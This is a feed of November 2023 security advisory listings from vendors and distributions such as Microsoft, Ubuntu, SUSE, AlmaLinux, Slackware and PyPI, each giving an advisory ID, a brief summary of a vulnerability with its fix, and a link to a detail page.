08.11.2023 22:24:49	pypi	[PYSEC-2023-230] matrix-synapse vulnerability	Synapse is an open-source Matrix homeserver Prior to versions 1.95.1 and 1.96.0rc1, cached device information of remote users can be queried from Synapse. This can be used to enumerate the remote users known to a homeserver. System administrators are encouraged to upgrade to Synapse 1.95.1 or 1.96.0rc1 to receive a patch. As a workaround, the `federation_domain_whitelist` can be used to limit federation traffic with a homeserver.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-230
10.11.2023 00:35:37	msrc	[MS:CVE-2023-5996] Chromium: CVE-2023-5996 Use after free in WebAudio		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5996
09.11.2023 10:00:00	msrc	[MS:CVE-2023-36024] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36024
09.11.2023 10:00:00	msrc	[MS:CVE-2023-36014] Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability (moderate)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36014
09.11.2023 14:47:44	almalinux	[ALSA-2023:6267] squid:4 security update (critical)	squid:4 security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6267
09.11.2023 08:18:48	almalinux	[ALSA-2023:6247] .NET 7.0 security update (moderate)	.NET 7.0 security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6247
09.11.2023 08:31:53	almalinux	[ALSA-2023:6187] firefox security update (important)	firefox security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6187
10.11.2023 10:00:00	msrc	[MS:CVE-2023-36027] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36027
10.11.2023 09:21:53	almalinux	[ALSA-2023:6194] thunderbird security update (important)	thunderbird security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6194
10.11.2023 19:15:35	suse	[SUSE-SU-2023:4415-1] Security update for clamav (important)	Security update for clamav	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4415-1
10.11.2023 19:12:52	suse	[SUSE-SU-2023:4414-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4414-1
10.11.2023 12:25:47	ubuntu	[USN-6465-3] Linux kernel (GKE) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6465-3
10.11.2023 12:16:47	ubuntu	[USN-6462-2] Linux kernel (IoT) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6462-2
10.11.2023 10:36:40	opensuse	[openSUSE-SU-2023:0361-1] Security update for tor (moderate)	Security update for tor	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0361-1
11.11.2023 16:59:01	rustsec	[RUSTSEC-2023-0070] Insufficient covariance check makes self_cell unsound	All public versions prior to `1.02` used an insufficient check to ensure thatusers correctly marked the dependent type as either `covariant` or`not_covariant`. This allowed users to mark a dependent as covariant even thoughits type was not covariant but invariant, for certain invariant types involvingtrait object lifetimes. One example for such a dependent type is `typeDependent<'a> = RefCell<Box<dyn fmt::Display + 'a>>`. Such a type allowedunsound usage in purely safe user code that leads to undefined behavior. Thepatched versions now produce a compile time error if such a type is marked as`covariant`.	https://secdb.nttzen.cloud/security-advisory/detail/RUSTSEC-2023-0070
12.11.2023 18:29:15	pypi	[PYSEC-2023-231] apache-airflow vulnerability	Apache Airflow, versions before 2.7.3, has a vulnerability that allows an authorized user who has access to read specific DAGs only, to read information about task instances in other DAGs. This is a different issue than CVE-2023-42663 but leading to similar outcome.Users of Apache Airflow are advised to upgrade to version 2.7.3 or newer to mitigate the risk associated with this vulnerability.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-231
12.11.2023 18:29:15	pypi	[PYSEC-2023-232] apache-airflow vulnerability	We failed to apply CVE-2023-40611 in 2.7.1 and this vulnerability was marked as fixed then. Apache Airflow, versions before 2.7.3, is affected by a vulnerability that allows authenticated and DAG-view authorized Users to modify some DAG run detail values when submitting notes. This could have them alter details such as configuration parameters, start date, etc. Users should upgrade to version 2.7.3 or later which has removed the vulnerability.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-232
13.11.2023 21:27:10	slackware	[SSA:2023-317-01] tigervnc	New tigervnc packages are available for Slackware 15.0 and -current to fixsecurity issues.Here are the details from the Slackware 15.0 ChangeLog```extra/tigervnc/tigervnc-1.12.0-i586-4_slack15.0.txz: Rebuilt. Recompiled against xorg-server-1.20.14, including patches for several security issues. Thanks to marav. For more information, see: https://www.cve.org/CVERecord?id=CVE-2022-3550 https://www.cve.org/CVERecord?id=CVE-2022-3551 https://www.cve.org/CVERecord?id=CVE-2022-3553 https://www.cve.org/CVERecord?id=CVE-2022-4283 https://www.cve.org/CVERecord?id=CVE-2022-46340 https://www.cve.org/CVERecord?id=CVE-2022-46341 https://www.cve.org/CVERecord?id=CVE-2022-46342 https://www.cve.org/CVERecord?id=CVE-2022-46343 https://www.cve.org/CVERecord?id=CVE-2022-46344 https://www.cve.org/CVERecord?id=CVE-2023-0494 https://www.cve.org/CVERecord?id=CVE-2023-1393 https://www.cve.org/CVERecord?id=CVE-2023-5367 https://www.cve.org/CVERecord?id=CVE-2023-5380 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/extra/tigervnc/tigervnc-1.12.0-i586-4_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/extra/tigervnc/tigervnc-1.12.0-x86_64-4_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/extra/tigervnc/tigervnc-1.13.1-i586-2.txzUpdated packages for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/extra/tigervnc/tigervnc-1.13.1-x86_64-2.txzMD5 signaturesSlackware 15.0 package:6cdaa7fbfc1f746d489ad8e1cc450df0 tigervnc-1.12.0-i586-4_slack15.0.txzSlackware x86_64 15.0 package:24d9849bbbd851f5c3f4a5da4f872668 tigervnc-1.12.0-x86_64-4_slack15.0.txzSlackware -current package:c8028eaff3f7053f900d840f0943b06a tigervnc-1.13.1-i586-2.txzSlackware x86_64 -current package:52cdcf1c405f094ce9a2d2482ca06a38 tigervnc-1.13.1-x86_64-2.txzInstallation instructions*Upgrade the package as root:`# upgradepkg tigervnc-1.12.0-i586-4_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-317-01
13.11.2023 17:26:54	ubuntu	[USN-6476-1] Memcached vulnerabilities	Several security issues were fixed in memcached.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6476-1
13.11.2023 17:04:17	ubuntu	[USN-6475-1] Cobbler vulnerabilities	Several security issues were fixed in Cobbler.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6475-1
15.11.2023 00:15:29	ubuntu	[USN-6479-1] Linux kernel (OEM) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6479-1
14.11.2023 23:30:56	slackware	[SSA:2023-318-01] mariadb	New mariadb packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mariadb-10.5.23-i586-1_slack15.0.txz: Upgraded. This update fixes bugs and a security issue: Vulnerability allows high privileged attacker with network access via multiple protocols to compromise the server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash. For more information, see: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22084 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mariadb-10.5.23-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mariadb-10.5.23-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/mariadb-10.11.5-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/mariadb-10.11.6-x86_64-1.txzMD5 signaturesSlackware 15.0 package:82195d80fd47e92a363de02bd73f2778 mariadb-10.5.23-i586-1_slack15.0.txzSlackware x86_64 15.0 package:82d1585d0c51add5b732d41877a97174 mariadb-10.5.23-x86_64-1_slack15.0.txzSlackware -current package:70dbbc338fcff0e18fee0efbb797727c ap/mariadb-10.11.5-i586-1.txzSlackware x86_64 -current package:089f5e1b4ec9be1f1bf763e14d129448 ap/mariadb-10.11.6-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mariadb-10.5.23-i586-1_slack15.0.txz`Then, restart the database server:`# sh /etc/rc.d/rc.mysqld restart`	https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-318-01
14.11.2023 12:43:25	ubuntu	[USN-6478-1] Traceroute vulnerability	Traceroute could be made to execute arbitrary commands.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6478-1
14.11.2023 11:44:00	ubuntu	[USN-6477-1] procps-ng vulnerability	procps-ng could be made to crash if it received specially crafted input.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6477-1
14.11.2023 10:00:00	msrc	[MS:CVE-2023-38151] Microsoft Host Integration Server 2020 Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-38151
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36719] Microsoft Speech Application Programming Interface (SAPI) Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36719
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36705] Windows Installer Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36705
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36560] ASP.NET Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36560
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36437] Azure DevOps Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36437
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36428] Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36428
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36427] Windows Hyper-V Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36427
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36425] Windows Distributed File System (DFS) Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36425
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36424] Windows Common Log File System Driver Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36424
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36423] Microsoft Remote Registry Service Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36423
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36422] Microsoft Windows Defender Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36422
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36413] Microsoft Office Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36413
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36410] Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36410
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36052] Azure CLI REST Command Information Disclosure Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36052
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36043] Open Management Infrastructure Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36043
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36036] Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36036
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36017] Windows Scripting Engine Memory Corruption Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36017
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36007] Microsoft Send Customer Voice survey from Dynamics 365 Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36007
14.11.2023 10:00:00	msrc	[MS:CVE-2023-38177] Microsoft SharePoint Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-38177
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36558] ASP.NET Core - Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36558
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36439] Microsoft Exchange Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36439
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36408] Windows Hyper-V Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36408
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36407] Windows Hyper-V Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36407
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36406] Windows Hyper-V Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36406
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36405] Windows Kernel Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36405
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36404] Windows Kernel Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36404
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36403] Windows Kernel Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36403
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36402] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36402
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36401] Microsoft Remote Registry Service Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36401
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36400] Windows HMAC Key Derivation Elevation of Privilege Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36400
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36399] Windows Storage Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36399
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36398] Windows NTFS Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36398
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36397] Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36397
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36396] Windows Compressed Folder Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36396
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36395] Windows Deployment Services Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36395
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36394] Windows Search Service Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36394
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36393] Windows User Interface Application Core Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36393
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36392] DHCP Server Service Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36392
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36046] Windows Authentication Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36046
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36047] Windows Authentication Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36047
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36049] .NET, .NET Framework, and Visual Studio Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36049
14.11.2023 10:00:00	msrc	[MS:CVE-2023-24023] Mitre: CVE-2023-24023 Bluetooth Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-24023
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36050] Microsoft Exchange Server Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36050
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36039] Microsoft Exchange Server Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36039
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36041] Microsoft Excel Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36041
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36042] Visual Studio Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36042
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36045] Microsoft Office Graphics Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36045
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36037] Microsoft Excel Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36037
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36038] ASP.NET Core Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36038
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36035] Microsoft Exchange Server Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36035
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36028] Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36028
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36030] Microsoft Dynamics 365 Sales Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36030
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36031] Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36031
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36033] Windows DWM Core Library Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36033
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36021] Microsoft On-Prem Data Gateway Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36021
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36025] Windows SmartScreen Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36025
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36016] Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36016
14.11.2023 10:00:00	msrc	[MS:CVE-2023-36018] Visual Studio Code Jupyter Extension Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36018
14.11.2023 06:26:40	ubuntu	[USN-6456-2] Firefox regressions	USN-6456-1 caused some minor regressions in Firefox.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6456-2
14.11.2023 02:00:00	cisa	[CISA-2023:1114] CISA Adds 3 Known Exploited Vulnerabilities to Catalog	CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/detail/CISA-2023:1114
14.11.2023 02:00:00	vmware	[VMSA-2023-0026] VMware Cloud Director Appliance contains an authentication bypass vulnerability (CVE-2023-34060). (critical)		https://secdb.nttzen.cloud/security-advisory/detail/VMSA-2023-0026
14.11.2023 22:22:43	pypi	[PYSEC-2023-233] exiv2 vulnerability	Exiv2 is a C++ library and a command-line utility to read, write, delete and modify Exif, IPTC, XMP and ICC image metadata. An out-of-bounds write was found in Exiv2 version v0.28.0. The vulnerable function, `BmffImage::brotliUncompress`, is new in v0.28.0, so earlier versions of Exiv2 are _not_ affected. The out-of-bounds write is triggered when Exiv2 is used to read the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to gain code execution, if they can trick the victim into running Exiv2 on a crafted image file. This bug is fixed in version v0.28.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-233
15.11.2023 16:51:43	ubuntu	[USN-6480-1] .NET vulnerabilities	Several security issues were fixed in .NET.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6480-1
15.11.2023 16:31:49	ubuntu	[USN-6483-1] HTML Tidy vulnerability	tidy-html5 could be made to crash or run programs if it opened a speciallycrafted file.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6483-1
15.11.2023 16:24:42	ubuntu	[USN-6482-1] Quagga vulnerabilities	Quagga could be made to crash if it received specially crafted networktraffic.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6482-1
15.11.2023 16:20:35	ubuntu	[USN-6481-1] FRR vulnerabilities	FRR could be made to crash if it received specially crafted networktraffic.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6481-1
15.11.2023 13:27:24	ubuntu	[USN-6473-2] pip vulnerabilities	Several security issues were fixed in pip.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6473-2
15.11.2023 11:38:15	ubuntu	[USN-6449-2] FFmpeg regression	USN-6449-1 introduced a regression in FFmpeg	https://secdb.nttzen.cloud/security-advisory/detail/USN-6449-2
15.11.2023 02:15:09	alpinelinux	[ALPINE:CVE-2023-46121] yt-dlp vulnerability	[From CVE-2023-46121] yt-dlp is a youtube-dl fork with additional features and fixes. The Generic Extractor in yt-dlp is vulnerable to an attacker setting an arbitrary proxy for a request to an arbitrary url, allowing the attacker to MITM the request made from yt-dlp's HTTP session. This could lead to cookie exfiltration in some cases. Version 2023.11.14 removed the ability to smuggle `http_headers` to the Generic extractor, as well as other extractors that use the same pattern. Users are advised to upgrade. Users unable to upgrade should disable the Ggneric extractor (or only pass trusted sites with trusted content) and ake caution when using `--no-check-certificate`.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-46121
15.11.2023 17:26:09	pypi	[PYSEC-2023-234] esptool vulnerability	An issue discovered in esptool 4.6.2 allows attackers to view sensitive information via weak cryptographic algorithm.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-234
15.11.2023 13:44:56	almalinux	[ALSA-2023:6667] samba security, bug fix, and enhancement update (moderate)	samba security, bug fix, and enhancement update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6667
15.11.2023 13:24:09	almalinux	[ALSA-2023:6679] curl security update (moderate)	curl security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6679
15.11.2023 14:25:06	almalinux	[ALSA-2023:6368] qemu-kvm security, bug fix, and enhancement update (moderate)	qemu-kvm security, bug fix, and enhancement update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6368
15.11.2023 14:07:52	almalinux	[ALSA-2023:6544] ghostscript security and bug fix update (moderate)	ghostscript security and bug fix update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6544
15.11.2023 14:35:32	almalinux	[ALSA-2023:6330] edk2 security, bug fix, and enhancement update (moderate)	edk2 security, bug fix, and enhancement update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6330
17.11.2023 09:05:47	suse	[SUSE-SU-2023:4476-1] Security update for xen (important)	Security update for xen	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4476-1
17.11.2023 09:05:29	suse	[SUSE-SU-2023:4475-1] Security update for xen (important)	Security update for xen	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4475-1
17.11.2023 06:42:07	suse	[SUSE-SU-2023:4473-1] Security update for frr (moderate)	Security update for frr	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4473-1
19.11.2023 12:15:49	alpinelinux	[ALPINE:CVE-2023-5341] imagemagick vulnerability	[From CVE-2023-5341] A heap use-after-free flaw was found in coders/bmp.c in ImageMagick.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-5341
18.11.2023 21:00:58	opensuse	[openSUSE-SU-2023:0374-1] Security update for yt-dlp (moderate)	Security update for yt-dlp	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0374-1
20.11.2023 18:04:07	ubuntu	[USN-6489-1] Tang vulnerability	Tang could allow unintended access to secret keys.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6489-1
20.11.2023 17:59:27	ubuntu	[USN-6490-1] WebKitGTK vulnerabilities	Several security issues were fixed in WebKitGTK.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6490-1
20.11.2023 17:46:14	ubuntu	[USN-6488-1] strongSwan vulnerability	strongSwan could be made to crash or run programs if it receivedspecially crafted network traffic.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6488-1
20.11.2023 17:29:03	ubuntu	[USN-6487-1] Avahi vulnerabilities	Avahi could be made to crash if it received specially craftedinput.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6487-1
20.11.2023 12:15:05	ubuntu	[USN-6486-1] iniParser vulnerability	Iniparser could be made to crash if it received a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6486-1
20.11.2023 13:21:41	pypi	[PYSEC-2023-240] apache-submarine vulnerability	Apache Software Foundation Apache Submarine has a bug when serializing against yaml. The bug is caused by snakeyaml https://nvd.nist.gov/vuln/detail/CVE-2022-1471 .Apache Submarine uses JAXRS to define REST endpoints. In order tohandle YAML requests (using application/yaml content-type), it definesa YamlEntityProvider entity provider that will process all incomingYAML requests. In order to unmarshal the request, the readFrom methodis invoked, passing the entityStream containing the user-supplied data in `submarine-server/server-core/src/main/java/org/apache/submarine/server/utils/YamlUtils.java`. We have now fixed this issue in the new version by replacing to `jackson-dataformat-yaml`.This issue affects Apache Submarine: from 0.7.0 before 0.8.0. Users are recommended to upgrade to version 0.8.0, which fixes this issue.If using the version smaller than 0.8.0 and not want to upgrade, you can try cherry-pick PR https://github.com/apache/submarine/pull/1054 and rebuild the submart-server image to fix this.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-240
20.11.2023 11:25:38	pypi	[PYSEC-2023-239] asyncssh vulnerability	An issue in AsyncSSH v2.14.0 and earlier allows attackers to control the remote end of an SSH client session via packet injection/removal and shell emulation.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-239
20.11.2023 23:22:06	pypi	[PYSEC-2023-241] piccolo vulnerability	Piccolo is an object-relational mapping and query builder which supports asyncio. Prior to version 1.1.1, the handling of named transaction `savepoints` in all database implementations is vulnerable to SQL Injection via f-strings. While the likelihood of an end developer exposing a `savepoints` `name` parameter to a user is highly unlikely, it would not be unheard of. If a malicious user was able to abuse this functionality they would have essentially direct access to the database and the ability to modify data to the level of permissions associated with the database user. A non exhaustive list of actions possible based on database permissions is: Read all data stored in the database, including usernames and password hashes; insert arbitrary data into the database, including modifying existing records; and gain a shell on the underlying server. Version 1.1.1 fixes this issue.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-241
